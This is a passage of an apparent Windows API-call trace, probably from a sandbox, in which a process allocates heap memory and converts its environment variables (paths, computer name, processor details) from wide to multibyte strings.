RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2612c0) returned 0x4 [0089.757] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2612c0, Size=0x8) returned 0x2612c0 [0089.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0089.757] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x2612d0 [0089.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x2612d0, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0089.757] GetLastError () returned 0x0 [0089.764] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2612c0) returned 0x8 [0089.764] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2612c0, Size=0xc) returned 0x261310 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0089.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x37) returned 0x261328 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x261328, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0089.764] GetLastError () returned 0x0 [0089.764] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261310) returned 0xc [0089.764] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261310, Size=0x10) returned 0x261310 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0089.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x255cd8 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x255cd8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0089.764] GetLastError () returned 0x0 [0089.764] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261310) returned 0x10 [0089.764] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261310, Size=0x14) returned 0x261368 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0089.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x31) returned 0x261388 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x261388, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0089.764] GetLastError () returned 0x0 [0089.764] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261368) returned 0x14 [0089.764] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261368, Size=0x18) returned 0x261368 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0089.764] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17) returned 0x2613c8 [0089.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2613c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0089.764] GetLastError () returned 0x0 [0089.765] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261368) returned 0x18 [0089.765] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261368, Size=0x1c) returned 0x2613e8 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0089.765] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25af30 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x25af30, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0089.765] GetLastError () returned 0x0 [0089.765] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2613e8) returned 0x1c [0089.765] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2613e8, Size=0x20) returned 0x2613e8 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.765] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x14) returned 0x261368 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x261368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0089.765] GetLastError () returned 0x0 [0089.765] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2613e8) returned 0x20 [0089.765] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2613e8, Size=0x24) returned 0x2613e8 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.765] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xd) returned 0x25ecc0 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x25ecc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0089.765] GetLastError () returned 0x0 [0089.765] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2613e8) returned 0x24 [0089.765] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2613e8, Size=0x28) returned 0x2613e8 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0089.765] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x25) returned 0x25af60 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x25af60, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0089.765] GetLastError () returned 0x0 [0089.765] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2613e8) returned 0x28 [0089.765] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2613e8, Size=0x2c) returned 0x2613e8 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0089.765] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x39) returned 0x255d20 [0089.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x255d20, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0089.766] GetLastError () returned 0x0 [0089.766] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2613e8) returned 0x2c [0089.766] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2613e8, Size=0x30) returned 0x2613e8 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0089.766] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x261420 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x261420, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0089.766] GetLastError () returned 0x0 [0089.766] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x2613e8) returned 0x30 [0089.766] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x2613e8, Size=0x34) returned 0x261440 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0089.766] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17) returned 0x2613e8 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x2613e8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0089.766] GetLastError () returned 0x0 [0089.766] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261440) returned 0x34 [0089.766] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261440, Size=0x38) returned 0x261440 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.766] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe) returned 0x25ecd8 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x25ecd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0089.766] GetLastError () returned 0x0 [0089.766] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261440) returned 0x38 [0089.766] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261440, Size=0x3c) returned 0x261440 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0089.766] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x69) returned 0x261488 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x261488, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0089.766] GetLastError () returned 0x0 [0089.766] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261440) returned 0x3c [0089.766] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261440, Size=0x40) returned 0x261440 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0089.766] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3e) returned 0x255d68 [0089.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x255d68, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0089.767] GetLastError () returned 0x0 [0089.767] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261440) returned 0x40 [0089.767] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261440, Size=0x44) returned 0x261500 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0089.767] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1b) returned 0x25f710 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x25f710, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0089.767] GetLastError () returned 0x0 [0089.767] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x44 [0089.767] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x48) returned 0x261500 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0089.767] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1d) returned 0x25f738 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x25f738, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0089.767] GetLastError () returned 0x0 [0089.767] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x48 [0089.767] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x4c) returned 0x261500 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0089.767] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x257100 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x257100, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0089.767] GetLastError () returned 0x0 [0089.767] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x4c [0089.767] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x50) returned 0x261500 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0089.767] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x261440 [0089.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x261440, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0089.767] GetLastError () returned 0x0 [0089.767] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x50 [0089.768] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x54) returned 0x261500 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0089.768] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x261460 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x261460, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0089.768] GetLastError () returned 0x0 [0089.768] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x54 [0089.768] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x58) returned 0x261500 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0089.768] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1b) returned 0x25f760 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x25f760, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0089.768] GetLastError () returned 0x0 [0089.768] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x58 [0089.768] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x5c) returned 0x261500 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0089.768] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25af90 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x25af90, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0089.768] GetLastError () returned 0x0 [0089.768] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x5c [0089.768] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x60) returned 0x261500 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0089.768] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x29) returned 0x25b668 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x25b668, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0089.768] GetLastError () returned 0x0 [0089.768] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x60 [0089.768] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x64) returned 0x261500 [0089.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0089.768] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x25f788 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x25f788, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0089.769] GetLastError () returned 0x0 [0089.769] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x64 [0089.769] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x68) returned 0x261500 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0089.769] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x41) returned 0x257150 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x257150, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0089.769] GetLastError () returned 0x0 [0089.769] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x68 [0089.769] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x6c) returned 0x261500 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0089.769] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17) returned 0x261578 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x261578, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0089.769] GetLastError () returned 0x0 [0089.769] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261500) returned 0x6c [0089.769] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x261500, Size=0x70) returned 0x261500 [0089.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 